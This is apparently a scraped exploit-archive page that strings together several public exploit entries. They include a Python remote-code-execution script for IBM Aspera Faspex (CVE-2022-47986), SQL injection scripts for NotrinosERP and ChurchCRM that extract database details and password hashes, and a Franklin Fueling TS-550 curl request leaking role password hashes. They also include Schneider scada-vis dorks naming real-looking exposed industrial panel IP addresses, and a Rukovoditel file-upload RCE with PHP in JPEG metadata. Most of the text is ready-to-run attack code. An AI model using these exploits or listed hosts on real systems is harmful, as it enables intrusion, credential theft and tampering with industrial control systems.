ISHACK AI BOT

# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE) # Date: 02/02/2023 # Exploit Author: Maurice Lambert <[email protected]> # Vendor Homepage: https://www.ibm.com/ # Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex # Version: 4.4.1 # Tested on: Linux # CVE : CVE-2022-47986 """ This file implements a POC for CVE-2022-47986 an YAML deserialization that causes a RCE in IBM Aspera Faspex (before 4.4.2). """ __version__ = "1.0.0" __author__ = "Maurice Lambert" __author_email__ = "[email protected]" __maintainer__ = "Maurice Lambert" __maintainer_email__ = "[email protected]" __description__ = """ This file implements a POC for CVE-2022-47986 an YAML deserialization that causes a RCE in IBM Aspera Faspex (before 4.4.2). """ license = "GPL-3.0 License" __url__ = "https://github.com/mauricelambert/CVE-2022-47986" copyright = """ CVE-2022-47986 Copyright (C) 2023 Maurice Lambert This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. """ __license__ = license __copyright__ = copyright __all__ = [] print(copyright) from urllib.request import urlopen, Request from sys import argv, exit, stderr, stdout from shutil import copyfileobj from json import dumps def main() -> int: if len(argv) != 3: print("USAGES:", argv[0], "[hostname] [command]", file=stderr) return 1 copyfileobj( urlopen( Request( argv[1] + "/aspera/faspex/package_relay/relay_package", method="POST", data=dumps({ "package_file_list": [ "/" ], "external_emails": f""" --- - !ruby/object:Gem::Installer i: x - !ruby/object:Gem::SpecFetcher i: y - !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::Package::TarReader io: &1 !ruby/object:Net::BufferedIO io: &1 !ruby/object:Gem::Package::TarReader::Entry read: 0 header: "pew" debug_output: &1 !ruby/object:Net::WriteAdapter socket: &1 !ruby/object:PrettyPrint output: !ruby/object:Net::WriteAdapter socket: &1 !ruby/module "Kernel" method_id: :eval newline: "throw `{argv[2]}`" buffer: {{}} group_stack: - !ruby/object:PrettyPrint::Group break: true method_id: :breakable """, "package_name": "assetnote_pack", "package_note": "hello from assetnote team", "original_sender_name": "assetnote", "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "metadata_human_readable": "Yes", "forward": "pew", "metadata_json": '{}', "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec", "delivery_sender_name": "assetnote", "delivery_title": "TEST", "delivery_note": "TEST", "delete_after_download": True, "delete_after_download_condition": "IDK", }).encode() ) ), stdout.buffer, ) return 0 if __name__ == "__main__": exit(main())

# Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection # Date: 11-03-2023 # Exploit Author: Arvandy # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md # Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7 # Vendor Homepage: https://notrinos.com/ # Version: 0.7 # Tested on: Windows, Linux # CVE: CVE-2023-24788 """ The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order. The OrderNumber parameter require a valid orderNumber value. This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application. """ import sys, requests def injection(target, inj_str, session_cookies): for j in range(32, 126): url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j))) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} r = requests.get(url, headers=headers) res = r.text if "NotrinosERP 0.7 - Login" in res: session_cookies = login(target, username, password) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)} r = requests.get(url, headers=headers) elif (r.elapsed.total_seconds () > 2 ): return j return None def login(target, username, password): target = "%s/index.php" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781') def retrieveDBName(session_cookies): db_name = "" print("(+) Retrieving database name") for i in range (1,100): injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): db_name += chr(retrieved_value) else: break print("Database Name: "+db_name) def retrieveDBVersion(session_cookies): db_version = "" print("(+) Retrieving database version") for i in range (1,100): injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i retrieved_value = injection(target, injection_str, session_cookies) if (retrieved_value): db_version += chr(retrieved_value) sys.stdout.flush() else: break print("Database Version: "+db_version) def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") retrieveDBName(session_cookies) print("") retrieveDBVersion(session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main()

# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection # Date: 11-03-2023 # Exploit Author: Arvandy # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md # Software Link: https://github.com/ChurchCRM/CRM/releases # Vendor Homepage: http://churchcrm.io/ # Version: 4.5.1 # Tested on: Windows, Linux # CVE: CVE-2023-24787 """ The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter. This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query. This script is created as Proof of Concept to retrieve the username and password hash from user_usr table. """ import sys, requests def dumpUserTable(target, session_cookies): print("(+) Retrieving username and password") print("") url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target) headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} r = requests.get(url, headers=headers) lines = r.text.splitlines() for line in lines: if "<td >Perseverance" in line: print(line.split("Perseverance")[1].split("</td>")[0]) def login(target, username, password): target = "%s/session/begin" % (target) headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "User=%s&Password=%s" % (username, password) s = requests.session() r = s.post(target, data = data, headers = headers) return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08') def main(): print("(!) Login to the target application") session_cookies = login(target, username, password) print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash") dumpUserTable(target, session_cookies) if __name__ == "__main__": if len(sys.argv) != 4: print("(!) Usage: python3 exploit.py <URL> <username> <password>") print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass") sys.exit(-1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main()

# Exploit Title: Franklin Fueling Systems TS-550 - Exploit and Default Password # Date: 3/11/2023 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/) # Version: TS-550 # Tested on: Linux/Android(termux) Step 1 : attacker can using these dorks and access to find the panel inurl:"relay_status.html" inurl:"fms_compliance.html" inurl:"fms_alarms.html" inurl:"system_status.html" inurl:"system_reports.html' inurl:"tank_status.html" inurl:"sensor_status.html" inurl:"tank_control.html" inurl:"fms_reports.html" inurl:"correction_table.html" Step 2 : attacker can send request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi Step 3 : if get response that show like this <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> Step 4 : attacker can crack the hashesh using john the ripper notice : most of the panels password is : admin Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

# Exploit Title: Schneider Electric v1.0 - Directory traversal & Broken Authentication # Google Dork: inurl:/scada-vis # Date: 3/11/2023 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: https://www.se.com/ # Version: all-versions # Tested on: Windows/Linux/Android # Attacker can using these dorks and access to the panel without password inurl:/cgi-bin/scada-vis/ inurl:/scada-vis/schedulers inurl:/cgi-bin/scada-vis/index.cgi inurl:/scada-vis inurl:/cgi-bin/scada-vis/touch.html POC : http://185.73.103.144:8080/cgi-bin/scada-vis/index.cgi http://185.73.103.38:8080/cgi-bin/scada-vis/touch.html http://88.213.153.98/cgi-bin/scada-vis/schedulers.cgi # Attacker can these this dork for bruteforce the panel inurl:/scada-vis/pin?return=index POC : http://143.176.129.1/scada-vis/pin?return=index http://62.163.74.206/scada-vis/pin?return=touch

Exploit Title: Rukovoditel 3.3.1 - Remote Code Execution (RCE) Version: 3.3.1 Bugs: rce via jpeg file upload Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 12-03-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== #First of all, we need to inject the php codes into the metadata of any jpeg file with exiftool. (for example) exiftool -overwrite_original -comment="<?php system('id'); ?>" index.jpeg exiftool -overwrite_original -DocumentName="<?php phpinfo(); ?>" index.jpeg #after that we need to get the base64 code of the image (i used this site) https://h3yy0.csb.app/ #and we have to do url encoding #now we have to upload profile photo Poc request (I changed the file name to hello.php and and pasted our base 64 code) POST /index.php?module=users/photo&action=save&token=34GtgxfEmO HTTP/1.1 Host: localhost Content-Length: 9567 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/index.php?module=users/account Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cookie_test=please_accept_for_session; sid=0d3esjp74uo3q3gp38r044vc9h; sidebar_closed=1 Connection: close img=data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4QB4RXhpZgAATU0AKgAAAAgABQENAAIAAAAWAAAASgEaAAUAAAABAAAAYAEbAAUAAAABAAAAaAEoAAMAAAABAAEAAAITAAMAAAABAAEAAAAAAAA8P3BocCBlY2hvICdzYWxhbScgPz4AAAAAAQAAAAEAAAABAAAAAf%2F%2BABU8P3BocCBwaHBpbmZvKCk7ID8%2B%2F9sAhAAJBgcSEhIVExMTFRUVFRYXFxUVFhUVFhgWFhUVFhYVFRUVGB0oIBgaJR0VFSExISUpKy4uLhcfMzgzLTcoLS4rAQoKCg4NDhoQEBstJR8lLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS3%2FwAARCAEqAKkDASIAAhEBAxEB%2F8QAGwAAAgMBAQEAAAAAAAAAAAAABAUCAwYBBwD%2FxAA8EAABAwIEAwYFAgUDBAMAAAABAAIRAyEEEjFBBVFhBiJxgZGhE7HB0fAy4RQjQlJiB3LxFVOCkhYz0v%2FEABkBAAMBAQEAAAAAAAAAAAAAAAECAwQABf%2FEACMRAAICAwEBAAICAwAAAAAAAAABAhEDITESQSJRE3EEMmH%2F2gAMAwEAAhEDEQA%2FAMhSCvYFVSaiWNWA2k2IqmFQxqJphBjIuYFcxqqar6YU2URYwK0NX1MKxKxkVOCFrBGuCFroBFWJSPHp5iSkePKrAnPhn8UhgisUhVsjwxS6fFRcplQcmQpWVxi6V1iYAVRCMphC0AjaYUpDom0KUL4BSShHdFFMQlNXscos0BLArmIdhV7CgFBNMIqmxDUkXSSMoi5rVbCraFNIxkQqIDEFGVXJfiCgEW4pyRY5yc4spFjSq4yWQT4hDq%2BsqFsXDEzpUCplQKZAKypUwolTpJgBtAIxgQtAIxgUWOiYCkvgF2EoRswq1qrYrmBSNBbTKJpqhgRNMJWFF9IIukEPSCJppGUQS0LjwuNXXJRkDVSgayPqIGuuCKsWkWNT7FpFjVXGRyCeqqSr6qoK2Ixs%2BUSpKLkUAqKtpBVlXUQiwINoBGMCGoBFtCkyiJBdhdC%2BSnDemiGBDsRFNRNBewIhiopq9oQYyCKaKpCUJTCYUWhoBO%2Bg%2BvgkodFnwiBOyi5dGOI0Fuu%2BiJyNfZtn8v6b6X2XOP6G2uiyqga6YVxFjql2IKUIrxZSPGJ1i3JJiyrYyOQVVkO5E1UO5a0Y2cUSpqLkUAqKIohUImgEWBB1AItoQ1AIpoUWURJfKQC%2BylA4bU1cxUMKuYVE0BNNEU0KwoikUGMg2gyfAXPgrcRVJv8AkbBcayAG8wHO8%2F0j6%2BaBxmLuYS1bovDSsJa46%2Fn5ZMcI0Nk7xcCJ8JSDDYq48dFsMNTytBy5Z1dmHzta0W5rTHHojPJQDjaeemH6uaBmkQSJgEjnokGIC1mJGQjdryQZtqI5m%2F5ssxj6Ra4tOxj91myKpDxdoR4wJLignWLSbEp8ZLILKqHciqg1Qz1qRkZEKJXVwpgEAiqAQ7GE7J5wjg1SpBIyt5nfwG6EmGKb4Qw7Z0Wt4B2PrVyC4FjT%2FwC0fRabsh2PY0B7h4E6nr0W6%2BG1ggAKDlfC6xpdMxg%2ByOHo3LQTzN%2Fmiv4DD%2F2N9ArOLYsCBE5vy6F%2BC78Kk3bNChS3o80arWKDArmBMSLWImkEOwImiLhKEN4jVyueOsDwFh8knxZBumPG3RUd4yPO%2FwBVnMXioF0yjtmi7ii2li8jpWx4Bxb4gykw7WMhqA%2FXSNF50yuC4X3%2FACStnwfE0gA2mXPdF%2FhkwP8AyJv42C1QRmymmxp7plvgQ076TMTe6Q46iajQ4fqbZw6bHy09ETVxThIdL7Gx29CSleHxZD80WM5m8wbO9ZlZ8sdjYnoDrcIqOmIS%2FF9na2wB81r3jK8NFxFp3B0KhVfJndGMa4JJ30wFbs%2FXE9wqqh2crvdlyGSJE9F6EcWGgjddxGJjK5pgxrsqJknBGOZ2HqhhLjDpAA%2BcrlLsqxpPxX2GwTrGceeJB1Wfo4t9V8CSSYHqklNlIYl9HGHFMRTpUxOgMSfFbfs72ciKlW51A%2B6H7K9nxT77oc%2F5dAtc2dlFS9F2lHgSx0aQqsc4ZC7yI%2FPy6Ar1BeLHzS%2BrxJ4BaTM9U%2F8AIoqmCOFt2gPG4oMFWsb%2FAAmy3q42bPnHovPf%2Bt4n%2FuuWi7b4rJTpUQYL%2FwCZU8JhgPuVjYRxxpEf8ifqf9DVhVzSh2K1pShCWFGYJsuA5lAsRuHOVwifwLvoxXTpZy8uJysFiTvoB8lj%2BMVxnMGwWp4szLRYN3Brj5idPArHYtsPE3Gn2VYr4P6%2Bjbs%2FwxtbvPIa3rv4D6rWMxNGk0MpjSLC2m7haVluH4ZzZOWzhEGQJEEB0XjWyfMqOs0tjLAd3ctzoZ0ynQEclZaM0nbLzWLgY535np4IOuCDOm33Tvh2EDiJ7rh%2Btuo6OHQ3XOJcPgdPlp9VLJwbHLZRWr5zTI5RPgNlB7h8R7TItIPKRKpwlKInY36QHTPomGMDXUnP2gt87%2FQhSjKiskAurTGYXiD%2BeqXY6o6iCDdp9p0PoQp06hhoPJve%2BR%2Bc9Aqs09xxmC5hB%2Ftgwm9C0KsnxJMnaPBc7JvLcSwRuZ80x4ZhmuDmaFs%2BcbfNNMHwkBwezUjRSnLVFILZvsA0QIPzRxa78ulfB2d2%2FJGGoWAmDHqhi4Ge2DcQxDmiImdOfql%2FD8Nmcc2ky48gLm6YDHseQMw1u0iEk%2F1AxJosLKboDyAYtaJKMoqT%2FwCD%2B3jg9bMNx7HGtXqP2LiG9GizQPJLoUiFyFc84ZtVjVUCptUzQE0dUZkJe07BB4YSUfmRSs6xZ2jxUv8AID2Snh%2BDNV8TA8BcHWAdUXxDCPqP%2Bf7lMcDhPhiD5J72df40MMLhW5cpAkWI52gEctijsPYlp7wI7s8jEtPT88A6T9Drt7osFG7J0X0AAQRb80K5iq8gjxHqNl83QIV93X5%2BxsfeChJ6pjRX0WYqq5shsmYA6g5QYHt6q11eKFSmYBDh7getw72VtOO5a9p6ET%2F%2BVXWw4NzoSHR07zr%2BsJFEpYFw2kXYeSNHFt%2BQdb3EeapxlGHtcLjfmRpJ8reStocRyVfhx3bevdd6zKKxjJLdg5pHnAc0%2B8IPQVsAxWHdSxIqCcj4vyJABB8fqthgoLmiJEfMD7FLa9djKbA%2B%2BYWnmIP2THAPhwgzYX6H%2Fg%2BqlPY8TS4BgIBj82RteiHiNuiowzIty%2B10a1yC0hW9ifFcMZT73t91lP8AU%2BoIoN%2FqcC4%2BwC2%2BIMvaOsn7LzDt%2FXc%2FFunQABvQDknx9FytuOzNLikuK5lGIVjQoBWNKmaA7h9GTPJEuYQvsGMrR1XcQ9E4pdIQ76hJ%2FPmu1H9ZVbKU8vzkdkAltOqR9fumuCOa2qW0KAP0kX9d05wbYCZAZe0QIQVZ0GdPzRFvJOirfh51XM5I%2BwNBrjprBBG17%2FMoTizfhSIs6b9M7XT7lEYQPpOtBHK3nBV%2Fal7X0Wm1nRP%2B5swfzZcn%2BJzX5IUcR4WKlJ1Zgu2XjqWy75W9EMaxNKm8%2FwBAg9CCNfULQ9kW56UO3%2BRMGfRKuM4AsFfZs%2FEbyyklnyLUJbVhi90U8c71TDU9QWyPIAfJo9Vp8LhhTLfAfQfRZPgwdUrYcn%2BhnvafcStpxxuSmx4mxA8Z%2FwCR6JWtDXuh1h%2F0g87%2FAGRLXSEPg%2B%2FRkakeiswtPKLlJKL%2BHJkKreaw3%2BouAPcqgCNCd1vHtk6FKu1WCz4WoInKJHklhakdPcTx5fLpXFqMg8%2FhlKnRuE2NBVmnCUqiis8NCHrVSfz2Usc09UtfiHN6hcOE1JOinh6bvuVU3GsIuYI5i6ErY92bue6NIGzQ4Yhv5KPbWA3CyNKvWcYhN8Lw9x1cUrGSHT8fSZ%2Bp%2BX83Vdfi1Bl8r3E7kEeFiRHqhW020qlJ7mh4ZUu0%2FwBXddYyOcJFx%2BsRSqO1cAcvibSEXukmdajbaHv%2FAMloudDpadJiI%2Bf2XeNvNSmWNIMnNaYBymSPH6pLjeGNfh3VDYtygbXIM%2FIJd2X4o8PFN5JABif7QYA%2BaXy2hlOJt%2BzLXNbF7WPOdIHXXy8UZ2ieH06otGXJ5Dl5%2FJLaeIygHwP7np08FKpWmmZN5%2FYT5R6ITTSo6FN2JOzlU52nkI00IsfZekcTp%2FEoOtNrdSPxywXZzAuJcRp6zAXpLyKNJpcL2DRzPKErl0PnaYPwkFmHaCIJvHIbSiMPXboXjwkD2WW41xCpLJJDTUY2GyP1FMuJ06VFrKgAD2lgJ3cHnK4HncyPBNCMpKxJTgpV9NFlnr6pJ22xPwsK8yQXDKI6pkys9sQJEXMLJ%2F6p4r%2BXTaP6jJ8gjFbFk3R5qSuL5cVCB6GWKjEU0UFViSIU7NFC2sbGUlc9odGx629wn8SlHEsFFwmujkidPANqiY0RdDhrabbjXmgOH4ks1kjxTl%2BNYRsTvJsCntC00L8Y3Ldo8VfwrHgWIA8QVCpUDiIcAdov5IXFU4u4R129UskNF%2FB7jqAqMJaYNvCQbRsstXrtnLVEGbg6Eg2g%2BSYYbEuaCWvA5zp6KOMqtqznYPEW9Cp2U82KOPdqAafwqelpaLy6ILiefRK%2BBUnPc1%2Bwt7%2FuiMfw5oMga9VdgKnw2kbk%2FVXh5rRGSdmxcO59EPVqQ2Jv%2B1lfTdmY2%2ByoqMlw%2FwBwHvF%2FVDLw7D003Y%2FC38b%2B8pp2p4m1mIpMeQGw6JtJso9mGBoAkTb2S%2FttgW4lxBaHZdDu3S4KhSrZbstEcbUohzTUcA1rg%2FSZLdAs7j%2BOfxuIbSpAhucF5mRDTLWjzufAJJiuEhrodUdG0l59pWj4F8KiIo0yXf3ER6IuajGrBHF%2BVnoeEqWvy%2BQXmvb%2BoXVYvDRZbnhLXuEuEDX8KwXaum19V2U94f0nXy5roNy2JkSjoyJXy7UEG6iqmdm%2BOIsg6teUsoYrNurwSNUtFxhhWyr69C0FA4GtBTSmZ3QCIshabiyn%2FwBKbUBLbHknNXDg2P55qgUiwjK0HrAXa%2Bj7fBGzhmR2pBHNMalF20TyIsU4o0w8S8eBghTfw0HT13VFC%2BEpTrplK1BzdW%2B0geaGq1cojbY6eX%2FK1fEuEtiRr4rN43BfDEkAnly%2B6nLHJMpDLFoUYhzrDblM%2BaGyknfX66lM6PDnv70fuunBx49E6VCt2w3C1YZAPmmGFINjrt4i8pPSadDa6OwtM6ei6QYm14XLWg7qyu4io5w%2FqbInnyQfCHFxDfD8%2BSauwjnCwUZ9RSP0wFSm6pVOaxm%2B0eHVang%2FDTtpyn8lEN4J3jAvvoneDwIbEgSOUqLTkyvpJFePr%2FBoujYaryPidfM8md16F264gGMyc15fXqSVpiZJs6a4dZ%2Fk7fz5qPwf8h6qhfKlkKGXDaZiUZ8UjRWYamAwQoVKKmzSi7C1ATJt1H2TfDVpsNOv3SLDsM2Gm50CZ03gbyUQDoNkXI9VV8CqD08QLeahQNiZjwt76oqizNE6bn9yj5TO9NEsO2%2F6gOYufoneDa076pc7DgHXyGvmrMO%2FIYA99PS6eE%2FDEnD2i%2FiWG7pWYxXDabhd5BJ3%2BQlbppD2%2FSPukHFsI4WcyRzkg%2Bg1VslPaI47TpmPr4dzM2UhzRo2fC0LlAjuh4yudoLz6lNMRgACSx5Y4i%2BaR4QFfhsHVEEhj7ad2T6eCgumhrQrrYbK5rnjubuFi0%2F5Dl1RNMtL%2B5BHiD8lpv4MOblLRJ1vYTsk2H4O3CudAEPIItqTIDfdLm0tFf8AHpvYz4G0ioDl3WwxTAxo1naNboPs9gAA17rnl15pxjGOcRAA%2FwAje3glxxl4uXRc04udR4AsoODC6Lu238lEHKLj1RGNrBoA1jUyR5SLDzQb8Q46OPg4AjyK5pIVNsyfbzCFzM4JtyK8xqF3Mnx%2By9n7SMaaLg9pFtW39ivI8bw17Zcwioz%2B5u3%2B5uoTRuicwAv8PQKMrhXyYQ01CS0fJfPbHX5eu67g7Nj3O6JaxsXueSSi9i7MSYnwA%2BgCNw7I1t81XWa7%2Bnujpb1OpUcOQ3aT6D7n2XI5jQPAFvMxMesAJhwwtIzEl52E2CQ4hznw39gOvII%2Fh%2BLFOwvtO3kmToDVmhY4umwHlr66rhbDe873t4QNUFWxQYwvefAX8kLwh1Su%2FM6Q1tmjSSflCbTArQ9wpJuCbXnT0G3mranFmhzabpJPLbzXKzxTZA13PU6BZ3D1C7EPB1AbpsBf1v6eJU3Ly9DqPpbNZU4c0iRBB5j6hDN4fTBGgjaYAR1fE%2FDp5heIt05DqrcOGYhoc0CTqFVeX%2FZJuS%2FoEaWC5cD0aCpvomqWkAw3SfqjmcMDdtdUVUeykOsbJXFjKa%2BFmApwLnRdxWPa02hx2k2H2WM4n2myOLXtI5EeyqPFQ6C07D0%2FSVOWVRVDxwuWzQOqPkmd7h0kCeY1b4gkdAradGbjuncatd1EWKXYOu53Uj3CbsMAcjtyPQqSkpdHlFxBOMUyabhOUxvcH1XkWJxfw3uBpw4G%2BUlvnuvZsdem7wO30%2Bi8c4%2FTBcTo4HyLToQdwrwf6ITX7BKmIo1P1Nc0%2FwBwA9wPoq%2F4aj%2F3x%2F6O%2ByCXE9kqNSTYRb5r5rjsiH0e4DOyXvnqpvTNC2hi0tdqZKhXwp12UcM8MufRdxOKLrgfZMKU%2FEkQPT7lfNxTaQzEgu2b9Y%2BSFpYeo8kzlaNY3jZSwlFgqZn338Tt5Lq%2FYb%2FQZh6hd%2FMrWAuxvXnC0fB8U1jLfqJ9AVnq1I1CMo7uwO%2F7JhkcBDbaT5LnaOVM0GFpmo8Oce6BJHhuVn%2BFVM%2BIq1m6fEjxGnoiqLXii7XM%2BRPJql2bwAYXsNpAI8VOrKcH2IIdmaOX0Q%2FB3mnOsX8uYQ2CDnB97h0Ejlsu1GFrgA4kjprshK07DFJqhk3ipa8yTlIge6W4jjJzFoMkGZ6bITEZgTmaYkacuiV4vA5jmbII0I36FSlllwrHFHoxfiBUOctnaPoQjsNw4G4bH%2FIKA4CGkwT3hYg6rStw5iWuIjbZSVyY8pKPC7D4ctEgeSm3EnNlcIG30K%2BoV8wg2PNcxBtBE9Vakloz3b2EEyCF5J2kohlZzDZpJj%2FB28f4nXzXrGHYSJ6XXm%2FbMMfUcBZzfcbHyNvNWxPRLKjH1GEGCoK1zpEHUaHpyVSoRNzw8B1JqA4jSOylwXEHImfww7qg1ZROmZumS39RsoDiJc8Nju8k%2FwATwjNokGJwppOkFLtdKafBnWxOW1sqFo0%2FjElkgDfmgHV7QSi6WOyNAbpuB9U%2BmTpoZYaoaegvpJ08U5wpaRJMmBMb%2BCS0sYxwg26dUbhsGcvdMCPNH1RyVmgwVQFnegE6DkJSXtTxQ0nNLLEub6C%2Fup4J7py72AJ6an5JZ2poZi0cgozybVF4Y9Mf9jcdnzTGbWOY5p1XhzszQPDY%2FZeacCxxpugzykajqtieKGmATDmO%2FrGx%2FwAgmjNNeWLKDTtDTG1csOjo5p2QwImYgHUIKvxHMIInkdiPFcqvygGfIqOSrKwToK4hw5tqtMnNFwN13C401GQHd4DwnoUNS4uGyLR%2BaJdjy4VWvpWB1CRtJWOot6G2Fxb2kgG41a76FNsE51TaOiRYSi97w5y13CsNCRNzdI6dRV%2FQ2jShhleS9qaJbXNQXEmeo3C9gxr4YV55x%2FB5gTC1N%2BaRlUfabPOcRTg201HgqkTjaRa4hDKhB6NbwdkUpTKhUgX33S3g7D8FW1A5cyo5OJAGhJOiUcSwbnXi6JbV2BiEQ089Pn4o9Bww2LwbmnzUqNNzW2uNytXicCKh5jc%2FRUPwEDQxyCXyP6X0yzQ4u1IG%2FXoFpOGcShuUiwi8%2Bv50VQ4Xm0EHdWUsDl7safk%2BKnKTXSsEmOeFYhtR9RznABoEeElBV3tr1jl%2FSLDx5pXXpEERa8ny0C7wbE%2FALXu0c6I%2BqlakW8%2BdlFekKeIIOhhOMe2sGfyntcP6mkd4DmOaFx5biHlzdQdemyJp4R1rd4W%2Fdc3TBVoqw2LqNYJaHTrFh6bFcw9cum5N9Dt0T%2FAYMx3hr0R%2BC4VTzERce6RtvgycUIcPwn4rTcghOOE8NNgdk6p4UMcLI1lEA5hodQh%2FG30V5f0fYbAgBFUSGmykyoEO0HMrpKPDNbl0vxwlhKQYmkHNiFpK7RkISEFdkDjPOO0nDoJIWb%2BEvUeO4IOaVjP%2BndE0J6BkhbsM4Q4%2FCBRcZkPgYFNoHJdbWiVVk0QqHKbXRGGql5gk%2BH3XzL3t4KLxl0uV3A9CXUHD%2Bq2yvpVIF7nQKNCubDL5fcqz4ZJEmDrbZdZ1BdHDEeJ%2FCVVSpAuI%2FCpF%2BUanxOpVrW5QTPJTkUihdxjDMYDz2WS4hXtTZGhK2GOpBzc7jqQADzOgWX4zQBrBjb5bHxWZaZq6hr2cwsSTpBlPeH1W1HcxzHPaVLgNMCjmIuAZHh%2ByE7O04cS3TMbdJRbB2zUUgGiNRt0U8xnTz381RnJMGxGhUatYwDNzZH0T8hWcz3tET8WR4IDDvdbNed0Y4aQipCtHZMgjcI3DHUEXQtSsGiPwKbcQDeU619Eew1wOUrO1nQ4haGk%2ByQ8RZ%2FMQy8sOPtA%2BJbmakv8AAp9Ch8FSTKtGG4Y6WAK80Qd7oXhmiYYZb6tGO6ADTc11zZGYWo0mSVbi2iEmqmNEnCi2M8RijTPcV1HHgkE25%2Fug8Fc3V2LaINtkr0OthWJxIqOpie6XCY36JpiCBfzWX4UP5g8QtBjj3h%2Ft%2Bqm%2BD1TE%2FaCq92Qgw1rp89JVlPh2Qhx3E%2BpRPHgPhf8Ak36JjxQfyR5KL4WT4FYWGsyxflzlC8KDQSWm8mW76q2kf%2Fr%2FANo%2BaTOMYq1vBDWgJXZo3uLiYEGFPD0QBJMrlU2KroG351Rq3sHzQxztjNcRrK7U4nTy2MoSibFBUB3kVKhPF9GP8UXX12V2Ao%2F8LmEAlGkLl%2BW2c9aQWxtkh4i8iotC39Kz%2FFP1hPl%2F1FxdLmXC%2B